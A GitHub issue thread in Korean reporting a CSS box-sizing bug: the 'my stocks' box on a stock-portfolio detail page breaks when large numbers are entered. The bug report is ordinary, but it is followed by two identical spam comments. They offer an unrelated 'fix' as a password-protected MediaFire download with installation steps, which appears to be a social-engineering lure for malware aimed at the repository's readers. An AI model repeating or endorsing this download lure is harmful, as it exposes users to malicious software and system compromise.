### ISSUE TITLE
[PC-Chrome-1920-포트폴리오상세페이지 > 내주식] 내 주식 box sizing오류

### ISSUE THREAD

**Issue by yzooop** [100-hours-a-week/5-team-HRTH-ustock-fe#135]
##  버그 설명

버그에 대한 명확하고 간결한 설명해주세요.

- 숫자가 커질 때, css가 깨진다
![스크린샷 2024-08-27 오후 4 31 16](https://github.com/user-attachments/assets/192f13a0-a1f5-418d-b68a-7dd9e0586620)

## 재현하는 방법

동작을 재현하는 단계:

1. Go to '포트폴리오 상세조회 페이지'
2. Click on 'swipe 창' + 주식추가 with 99999주, 9999999999원
3. See error

## 예상한 동작

숫자가 늘어나도, 밑으로 내려오지 않고 옆으로 늘어나야 한다. 

## 스크린샷 (옵션)

문제를 설명하는 데 도움이 되는 스크린샷을 추가하세요. 스크린샷으로 어렵다면 영상첨부해주세요.

## 데스크톱(다음 정보를 작성해 주세요):

- OS: [예) iOS]
- Browser [예) chrome, safari]
- Version [예) 22]

## 추가적인 내용 (옵션):

여기에 문제에 대한 다른 컨텍스트를 추가해주세요.

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
